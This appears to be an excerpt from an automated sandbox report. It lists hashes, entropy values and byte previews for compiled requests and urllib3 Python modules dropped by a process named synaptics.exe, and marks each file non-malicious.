                                                                                                                                                                                                                Entropy (8bit):5.728659378875917
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:2+vEE3B8QaXQ/aMZaSUp8DuaiCSu6woOXRAdeMz2F4K1r7w:2Wn3WKfr/piTNg+eDFs
                                                                                                                                                                                                                MD5:38E02DDFE0E0FFC5B44B32F56B67F8FC
                                                                                                                                                                                                                SHA1:038E4A255F15207CF2DF62A97027FDE36B39C0F8
                                                                                                                                                                                                                SHA-256:7C423B3BA4ED65AF6CB272F56A237468CE4CC089CB9295E26CC585F8BA461873
                                                                                                                                                                                                                SHA-512:043ABD86864ABD61BABB5ED91CC597012EAC62B1B5AF64908FAA640BFEE1A8342EE47B81FCB348665CFDD91E1A398901F766E6CACE33EA3F40221DACA264FAEB
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s....d.a.d.d.l.m.Z...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..i.d%d&..d'd(..d)d*..d+d,..d-d...d/d0..d1d2..d3d4..d5d6..d7d8..d9d:..d;d<..d=d>..d?d@..dAdB..dCdD..dEdF....i.dGdH..dIdJ..dKdL..dMdN..dOdP..dQdR..dSdT..dUdV..dWdX..dYdZ..d[d\..d]d^..d_d`..dadb..dcdd..dedf..dgdh....i.didj..dkdl..dmdn..dodp..dqdr..dsdt..dudv..dwdx..dydz..d{d|..d}d~..d.d...d.d...d.d...d.d...d.d...d.d.....Z.e.d.d...Z.d.d...Z.e.....d.S.).a.....The ``codes`` object defines a mapping from common names for HTTP statuses.to their numerical codes, accessible either as attributes or as dictionary.items...Example::.. >>> import requests. >>> requests.codes['temporary_redirect']. 307. >>> requests.codes.teapot. 418. >>> requests.codes['\o/']. 200..Some codes have multiple names, and both upper- and lower-case versions of.the names are allowed. For example, ``codes.ok``, ``codes.OK``, and.``codes.okay
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4403
                                                                                                                                                                                                                Entropy (8bit):5.089793546399318
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:GVEvJgabXXYp+hwKMGZG3h+VLTovFx0qjax7evl:GUJrbXX6wtEhL39
                                                                                                                                                                                                                MD5:EF6CE4957902D0E8832DF1F730196C1F
                                                                                                                                                                                                                SHA1:EFB2D6706F0B0C6945B5BC8E340A897BD86AEE99
                                                                                                                                                                                                                SHA-256:62FB0D2CFC30681DBC82927E191B6303298545F7CF164BB78EA1F3C9034245C7
                                                                                                                                                                                                                SHA-512:8C3FC1DC666C90E7B0BEC261EED32CE2FD856AC631725395CA4B9F18805B9651847CEEE042AF71CB6D1184599C99D9509CEE061ADE67AD0D2A05AC5F1A2C070B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f`........................@...sD...d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).zO.requests.structures.~~~~~~~~~~~~~~~~~~~..Data structures that power Requests.......)...OrderedDict.....)...Mapping..MutableMappingc....................@...sb...e.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...CaseInsensitiveDicta....A case-insensitive ``dict``-like object... Implements all methods and operations of. ``MutableMapping`` as well as dict's ``copy``. Also. provides ``lower_items``... All keys are expected to be strings. The structure remembers the. case of the last key to be set, and ``iter(instance)``,. ``keys()``, ``items()``, ``iterkeys()``, and ``iteritems()``. will contain case-sensitive keys. However, querying and contains. testing is case insensitive::.. cid = CaseInsensitiveDict(). cid['Accept'] = 'application/json'. cid['aCCEPT'] == 'application/json'
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):24591
                                                                                                                                                                                                                Entropy (8bit):5.587543517392799
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:NwAXYuKd5j1OCC04lbTaUGMAuAWtNNMAMFFOCTGvq2iqkg+p/cdiGjYrUcszdvLk:NW/54lPaQxA2usCTGGZcdzTR5vLk
                                                                                                                                                                                                                MD5:A32D0E9E56C6552BF8AB56BA075D705B
                                                                                                                                                                                                                SHA1:5CE7E190AF526D9E2A888D89FB2AF6EA7B5A2D77
                                                                                                                                                                                                                SHA-256:4AF84131ADD30FF8130F097CC4D0B49E8E00EB2D3BCC461BC0E15136DAB2CB93
                                                                                                                                                                                                                SHA-512:9E638C2FB89C0B58649231051C115EF7EA02901E78B74336D5A2F45B14D6AA780087E3D67C7134C6B2832B32EC91E25FDECFE1884D8456D27965C433FB82E90E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fS........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m Z!..d.d.l.m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,m-Z-m.Z.m/Z/..d.d.l0m1Z1..d.Z2e..3..Z4d.d.d...Z5d..6e..7d.e.d.d...d.......Z8e.j9d.k.r.d.d...Z:d.d...Z"d.d...Z;d.d ..Z<dtd"d#..Z=d$d%..Z>d&d'..Z?e.j@d(d)....ZAd*d+..ZBd,d-..ZCd.d/..ZDd0d1..ZEdtd2d3..ZFd4d5..ZGd6d7..ZHd8d9..ZId:d;..ZJd<d=..ZKd>d?..ZLd@dA..ZMdBdC..ZNeOdD..ZPdEdF..ZQdGdH..ZRdIdJ..ZSdKdL..ZTdMdN..ZUdOdP..ZVe.j@dQdR....ZWdSdT..ZXdudUdV..ZYdWdX..ZZdvdYdZ..Z[dwd\d]..Z\d^d_..Z]d`da..Z^db._dc..Z`e`dd..Zae`de..Zbdfdg..Zcdhdi..Zddjdk..Zedldm..Zfdndo..Zgdpdq..Zhdrds..Zid.S.)xz..requests.utils.~~~~~~~~~~~~~~..This module provides utility functions that are used within Requests.that are also useful for external consumption.......N)...OrderedDict)...make_headers..parse_url..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6091
                                                                                                                                                                                                                Entropy (8bit):5.505360008763475
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:B/KVMbgcD9Q0jnBw/lM2oAH7KR2hSRlcLJCuhvPFor70SSD4BPa/vpy6GzbDZrH:YVIgchjjneT2CFCuh8aDiPwQRrH
                                                                                                                                                                                                                MD5:BB1FB008F51AC4575590ED955785C327
                                                                                                                                                                                                                SHA1:AB8DFDB9D746C7D6D84518F9A5393021B59CD4FA
                                                                                                                                                                                                                SHA-256:E4F9C87D335AD4A4429BAAF7A969E7A7821F52A914952D8F77937C27692457A4
                                                                                                                                                                                                                SHA-512:75FA18CC051930525D81B96DB1AB38926580A1BBBA07B81762C75B9EED2F7F5A3646EF8751596E50C513DECB86D40B6470611CF035787DCF7EC92A18C23B4F73
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fC........................@...s....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..z.d.d.l$Z$W.n...e%y{......Y.n"w.e$j&.'d...s.e..(d.e$j&..d...e.j)....n.e$j*d.k.r.e%d.e$j&..d.......d.Z+d.Z,e.Z.d.Z-e...e/...0e.......e.j1f.dBd.d...Z2[.e.j3d.e.j4d d!....e.j3d"e.j5d d!....e.j6f.dCd&d'..Z7e...Z8d.d.d.d d d d.d(d.d)..dDd>d?..Z9e.j:d@k.r.d.dAl;m<Z<..e<....d.S.d.S.)Eze.Python HTTP library with thread-safe connection pooling, file post support, user friendly, and more......)...annotationsN)...NullHandler.....)...exceptions)..._TYPE_BODY)...HTTPHeaderDict)...__version__)...HTTPConnectionPool..HTTPSConnectionPool..connection_from_url)..._TYPE_FIELDS..encode_multipart_formdata)...PoolManager..ProxyManager..proxy_from_url)...BaseHTTPResponse..HTTPResponse)...make_headers)...Retry)...Timeoutz.OpenSSL zUurllib3 v2 only suppo
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5666
                                                                                                                                                                                                                Entropy (8bit):5.116883122593759
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:b/rlHd/T49ElnxsGaqlYrxg5BLYrrN/jFV/5/iWb01GJwIGdP2vI5PAv/Atd2Nq:bzlHd/89El98SGrpn5/iWb01GJBvI5Px
                                                                                                                                                                                                                MD5:2744330991AED22B1699631635D58A2E
                                                                                                                                                                                                                SHA1:FD2AEFED7B1B8143C84A3F0F9F748A3DFFEB41D1
                                                                                                                                                                                                                SHA-256:B7C4439E22C8B53FE699879168E012244BA4F49EEA9CDE0AFCDD8D3F6EBEF80B
                                                                                                                                                                                                                SHA-512:48B94D7DCB7AF296790032102ABEF532AE131B0ECCBAAF5323A24670400139B159CD222E16EF74E8AD8E669432E0CA1B074A3B991E352705369FD66C41A4DD08
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.j.e.e.j.e.j...e.j.e...e.f...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.e.j.rfd.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e.e...Z.d.S.d.S.)......)...annotationsN.....)..._TYPE_SOCKET_OPTIONS)..._DEFAULT_TIMEOUT.._TYPE_TIMEOUT)...Urlc....................@...s....e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)...ProxyConfig..ssl.SSLContext | None..ssl_context..boolZ.use_forwarding_for_https."None | str | typing.Literal[False]..assert_hostname..str | None..assert_fingerprintN....__name__..__module__..__qualname__..__annotations__..r....r.....GC:\Users\user\Desktop\tmp\lib\site-packages\urllib3\_base_connection.pyr........s..............r....c....................@...s6...e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)..._ResponseOptions..strZ.request_methodZ.request_urlr......preload_content..decode_content..enforce_content_lengthNr....r....r....r....r....r........s..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16232
                                                                                                                                                                                                                Entropy (8bit):5.256023149221024
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:ldFpjR4qRg8OGlm9VP0Zxfl9Zg2j142c84ll4OERj4T/gW9lYyscf:Haf8O4m9VPaxfS2Sl4ORTvNso
                                                                                                                                                                                                                MD5:98E2637F62396D7176C437B453ED9AAD
                                                                                                                                                                                                                SHA1:01E86C4955E003C891DCF0329D049037EC88EF37
                                                                                                                                                                                                                SHA-256:5DD5F42547BB8A43ECB86FACD5B56B4AF076360E5F3FA84FBA6443C2BF44C8E8
                                                                                                                                                                                                                SHA-512:D5BE672100274B33D7DD42BA809246E655127A6AFF7325CE68B1A0F4C8BE43140AC9B09672AB7C50821610EC8ED022DE58DDDFB0CCE66AB780BF2E8CD4C3DF77
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.C.......................@...s:...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.j.r5d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.d.g.Z.e...d...Z.e...d...Z.e...d...Z.e.j.d.e.j.e.e.f...e.j.e.j.e.e.f.....d.f...Z.G.d.d...d.e...Z.d.d.d...Z.G.d.d...d.e.j.e.e.f...e.j.e.e.f.....Z.G.d.d...d.e.j.e.j.e.e.f.......Z G.d.d...d.e.j.e.e.f.....Z!d.S.)......)...annotationsN)...OrderedDict)...Enum..auto)...RLock)...Protocol)...Selfc....................@...s ...e.Z.d.Z.d.d.d...Z.d.d.d...Z.d.S.)...HasGettableStringKeys..return..typing.Iterator[str]c....................C........d.S...N......selfr....r.....CC:\Users\user\Desktop\tmp\lib\site-packages\urllib3\_collections.py..keys...........z.HasGettableStringKeys.keys..key..strc....................C...r....r....r......r....r....r....r....r......__getitem__....r....z!HasGettableStringKeys.__getitem__N..r....r......r....r....r....r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r........s..........r......Recentl
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):9075
                                                                                                                                                                                                                Entropy (8bit):5.250556892226646
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:TR6oSXCyxq9B8lhwzOcRtKtABQS0Sr6Ma/:96oe7q9H6cRTBB0Sr6Ma/
                                                                                                                                                                                                                MD5:432FA1C71B11ED7F1B671AD082D6402A
                                                                                                                                                                                                                SHA1:BD8A5383696A662605ACAB143A59185F380FCA82
                                                                                                                                                                                                                SHA-256:E83C0F2DA6088EDFB8A75743DD6F1A9CEFED9D55DEE96A2FA3AE88DEE1F3A2FB
                                                                                                                                                                                                                SHA-512:074D8864D9D47DEFC50707BF8E5E679D56D19F687EB4A09501D4F7A5C9A8FDC2E704F30F707FE3C5CFADC9F05C4C2A1FE2E46F49F5BFD57D79D4BE280B3C4163
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.&.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.g.Z.e.j.e.j.e.j.e.e.j.e.e.f...f.....e.j.e.e.j.e.e.f...f...f...Z.G.d.d...d...Z.d.S.)......)...annotationsN)...urlencode.....)..._TYPE_BODY)...HTTPHeaderDict)..._TYPE_FIELDS..encode_multipart_formdata)...BaseHTTPResponse..RequestMethodsc....................@...sp...e.Z.d.Z.d.Z.h.d...Z.d%d&d.d...Z.........d'd(d.d...Z.........d)d*d.d...Z.....d+d,d!d"..Z.........d'd-d#d$..Z.d.S.).r....a..... Convenience mixin for classes who implement a :meth:`urlopen` method, such. as :class:`urllib3.HTTPConnectionPool` and. :class:`urllib3.PoolManager`... Provides behavior for making common types of HTTP request methods and. decides which type of request field encoding to use... Specifically,.. :meth:`.request_encode_url` is for sending requests whose fields are. encoded in the URL (such as GET, HEAD, DELETE)... :meth:`.request_encode_body`
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):479
                                                                                                                                                                                                                Entropy (8bit):5.327992004239093
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:y/2lYN5ltyLSbBjz/8Ck4w3u5r3PyNAQ9AFtHzFAGhRvsx2c6m87lE/bZAuGuFMa:C2KjR85Yr3auej47+D+0GiZ8I4srEkJ
                                                                                                                                                                                                                MD5:3B0FC8D77ED03F8F10FDC0D4BFB5FCEF
                                                                                                                                                                                                                SHA1:87648C6038D79F930F0561B1E8A38E0AC75F92FB
                                                                                                                                                                                                                SHA-256:62149554D7158B8B6B83432D4C9D911AF2E0507B6722515B95C66F20E6B07426
                                                                                                                                                                                                                SHA-512:F3C8FBE8AFD6BA68C44843A78C9CB48C43E14CFDCD46779556BD4C5984147323160BA75C416F76A8DF2CDC5389034B7CE2F69562D93231FFE62DF0783E09622D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...sh...U.d.Z.e.r.d.d.l.m.Z.m.Z...e.e.e.e.f...d.f...Z.n.e.Z.e.e.d.<.e.e.d.<.e.e.d.<.e.e.d.<.d...Z.Z.d...Z.Z.d.S.).F.....)...Tuple..Union...version..__version__..__version_tuple__..version_tuplez.2.2.3)......r.........N)...TYPE_CHECKING..typingr....r......int..strZ.VERSION_TUPLE..object..__annotations__r....r....r....r......r....r.....?C:\Users\user\Desktop\tmp\lib\site-packages\urllib3\_version.py..<module>....s..........................
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):24008
                                                                                                                                                                                                                Entropy (8bit):5.538924468409744
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:D3oOv1iEkiRj91RsJ0YTnenrRaBVIT7sgTbzXugzTBDERk4VypKsFVc56AnzeuqG:D3o8rjRsJ0YTG6I8gniiJqYpn6QesG
                                                                                                                                                                                                                MD5:538643CFF85A52EA3AB03A03BC55EC50
                                                                                                                                                                                                                SHA1:BB8A81E9EA3FCB1B916410CC22F970B6076818D9
                                                                                                                                                                                                                SHA-256:4E96F9FCE28613E74764A6C72B37C91F97E434104663B16399410595F2EDC3C6
                                                                                                                                                                                                                SHA-512:13B98F4E6A89474FB79E07BC50C59B492AECF62D11E4228F942650D7CFD7358B00ADDA32ABCA1334DCBDE9A7C015CB2B1B8E9CDB9182F51F990347F6F159F542
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fT........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.r[d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"m#Z#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..z.d.d.l)Z)e)j*Z+W.n...e,e-f.y.......d.Z)G.d.d...d.e...Z+Y.n.w.d.d.l/m0Z0..d.d.l/m1Z1..d.d.l/m2Z2..d.d.l3m4Z4..d.d.l5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;..d.d.l<m=Z=m>Z>m?Z?m@Z@..d.d.lAmBZB..d.d.l.mCZD..d.d.l.mEZEmFZFmGZGmHZHmIZI..d.d.lJmKZKmLZL..d.d.lMmNZN..eOZOePZPe..QeR..ZSd.d.d ..ZTe..Ud!d"d...ZVe..Wd#..ZXeYe.d$..ZZG.d%d&..d&e...Z.G.d'd(..d(e...Z[G.d)d*..d*e.j\..Z]d+d,..d_dFdG..Z^.+d`dadNdO..Z_dbdTdU..Z`dcdVdW..ZaG.dXdY..dY..Zbe)..s[ebZ[e[Zc..ddded]d^..Zdd.S.)f.....)...annotationsN)...HTTPConnection)...HTTPException)...ResponseNotReady....timeout.........HTTPResponse)..._TYPE_PEER_CERT_RET_DICT)...SSLTransport)...HTTPHeaderDict)...probe)...assert_header_parsing)..._DEFAULT_TIMEOUT.._TYPE_TIME
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):29196
                                                                                                                                                                                                                Entropy (8bit):5.438791665772976
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:Gi2lt3Jti2pYtq6fBiKrzYIpKneR4TliLX1XkFCDD2rz8vIkwjYHklf8HvpnykHN:1cQ22tqUBi9eOTlfavNyke9aR
                                                                                                                                                                                                                MD5:F564D90A9B5167DB4568BCA538216282
                                                                                                                                                                                                                SHA1:3E6CC958ADCB919CED1D7EA877C8430E5F6E3068
                                                                                                                                                                                                                SHA-256:8BC1FB2AB64931CB7FDA3258A11EF61EE71EC4A50EAA38AC1C5A29162A1491CF
                                                                                                                                                                                                                SHA-512:1B3AACD4669A7CF3A7A47C2CCCB05E9293BB7D254770B36E05E561A6B0F46E0CCE073CBA8C8A8CB9A5BDDD6B52581E3111DCBA421119B4AEFC0FD811EFA9F019
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...sV...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*m+Z+..d.d.l,m-Z-..d.d.l.m/Z/..d.d.l0m1Z1..d.d.l2m3Z3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:m;Z;m<Z<..d.d.l=m>Z>m?Z?..d.d.l=m@ZA..d.d.l=mBZB..d.d.lCmDZD..e.jEr.d.d.lFZFd.d.lGmHZH..d.d.l.mIZImJZJ..e..KeL..ZMe.jNe<eOe;d.f...ZPG.d.d...d...ZQe.jRe.jSh.ZTG.d.d...d.eQe...ZUG.d.d...d.eU..ZVd6d$d%..ZWe.jXd7d*d+....Z@e.jXd8d,d+....Z@d9d-d+..Z@..d:d;d1d2..ZYd<d4d5..ZZd.S.)=.....)...annotationsN....timeout)...TracebackType.....)..._TYPE_BODY)...HTTPHeaderDict)...RequestMethods)...BaseSSLError..BrokenPipeError..DummyConnection..HTTPConnection..HTTPException..HTTPSConnection..ProxyConfig.._wrap_proxy_error)...port_by_scheme)...ClosedPoolError..EmptyPoolError..FullPoolError..HostChangedError..InsecureRequestWarning..Location
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):13219
                                                                                                                                                                                                                Entropy (8bit):4.9510831348530076
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:MN3d2MCSNJR3aibXrLh86mCrEl7mRkUfLL2xEZiru/cc8fditjgsS5ioCR:M1dfCSNJR3aibXrLh86frElCRvTCuUrM
                                                                                                                                                                                                                MD5:32D6E371B98501C1A5D361801FAD0583
                                                                                                                                                                                                                SHA1:5430310EA3717DB113266EC001C9DCF09B696516
                                                                                                                                                                                                                SHA-256:E67190468EBE193E15501F3572CA3005F996E1F6938BD9CED9F57556FE3B56FA
                                                                                                                                                                                                                SHA-512:2B854B5BD40A60C37C6A8D5ABA10E75ED8D027100BBA57DB40BA24B1296CD70A45E13342A4CBEDDED95FC6D350405E8B2E70CD5E2642F338A143E828764A33E3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.$.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j.r9d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.e.j.e.j.d.e.f...e.j.e.d.f...f...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z e Z!G.d.d...d.e...Z"G.d.d...d.e...Z#G.d.d ..d e...Z$G.d!d"..d"e...Z%G.d#d$..d$e%e...Z&G.d%d&..d&e%..Z'G.d'd(..d(e'e...Z(G.d)d*..d*e(..Z)G.d+d,..d,e...Z*G.d-d...d.e...Z+G.d/d0..d0e...Z,G.d1d2..d2e-e...Z.G.d3d4..d4e...Z/G.d5d6..d6e...Z0G.d7d8..d8e...Z1G.d9d:..d:e...Z2G.d;d<..d<e2..Z3G.d=d>..d>e2..Z4G.d?d@..d@e2..Z5G.dAdB..dBe2..Z6G.dCdD..dDe...Z7G.dEdF..dFe e-..Z8G.dGdH..dHe...Z9G.dIdJ..dJe.e...Z.G.dKdL..dLe.e...Z:G.dMdN..dNe...Z;G.dOdP..dPe<e0..Z=G.dQdR..dRe-..Z>G.dSdT..dTe...Z?G.dUdV..dVe...Z@d.S.)W.....)...annotationsN)...MessageDefect)...IncompleteRead.....)...HTTPConnection)...ConnectionPool)...HTTPResponse)...Retryc....................@........e.Z.d.Z.d.Z.d.S.)...HT
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):9701
                                                                                                                                                                                                                Entropy (8bit):5.39838188639722
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:CIk7HKu22d82vhf5Ev375rL9FYAKHK0oi7:Tk7HKu22Cehf+vL5rL9FYAKHboi7
                                                                                                                                                                                                                MD5:C5C5B60925F3FD0BB5CF887C16EB3D1B
                                                                                                                                                                                                                SHA1:2617C5BC224C2A8E3B11199DD67E6A3DB9421494
                                                                                                                                                                                                                SHA-256:7EED02F3496E17A38DD6A74F6E78778EA6EBE9D751F4FE3B6FB68CCFA072060A
                                                                                                                                                                                                                SHA-512:15CC009F6D2B7BD94798C2E7DF3C610E0AE048D51479EF3A6FE208B0D263EF8F8A99A72B560AB001762745AEB991F4D8150A20719F7BE8032C7544189D09AF67
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f[*.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.e.e.f...Z.e.j.e.e.j.e.e.f...e.j.e.e.e.f...f...Z...d.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.G.d.d...d...Z.d.S.)......)...annotationsN..application/octet-stream..filename..str | None..default..str..returnc....................C...s....|.r.t...|...d...p.|.S.|.S.).z.. Guess the "Content-Type" of a file... :param filename:. The filename to guess the "Content-Type" of using :mod:`mimetypes`.. :param default:. If no "Content-Type" can be guessed, default to `default`.. r....)...mimetypesZ.guess_type).r....r......r.....=C:\Users\user\Desktop\tmp\lib\site-packages\urllib3\fields.py..guess_content_type....s..........r......name..value.._TYPE_FIELD_VALUEc........................s....d.d.l.}.|.j.d.t.d.d.....t...t...r.....d.....t...f.d.d...d.D.....s=|...d.....d...}.z.|...d.....W.|.S...t.t.f.y<......Y.n.w.t.j.....d.....|...d...........S.).a..... Helper function to format and q
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2331
                                                                                                                                                                                                                Entropy (8bit):5.57875179670287
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:BL1hfLSZUyrfcuCKwlb9BEA2GS8FD5yHbVz:NLSZxc59TEA2CDUHbx
                                                                                                                                                                                                                MD5:8EC6377DD28ADF50E08929F9E358D816
                                                                                                                                                                                                                SHA1:E6C2723C0AC28BD5B6590FE4A9929F6E2300A4EB
                                                                                                                                                                                                                SHA-256:DDF7087F8EC76758267A5630DE9F5DBECF24C6956D52BBD8650467B6F48130CD
                                                                                                                                                                                                                SHA-512:1E5212FE5DDF6B20224997BA7901D0688FADCA8D3FF89E2FDAB4C1F615D96F1AFB72A4C30559EF066F3A92EA05643262FFFFF500931512A851F2AF0FCC959C05
                                                                                                                                                                                                                Malicious:false
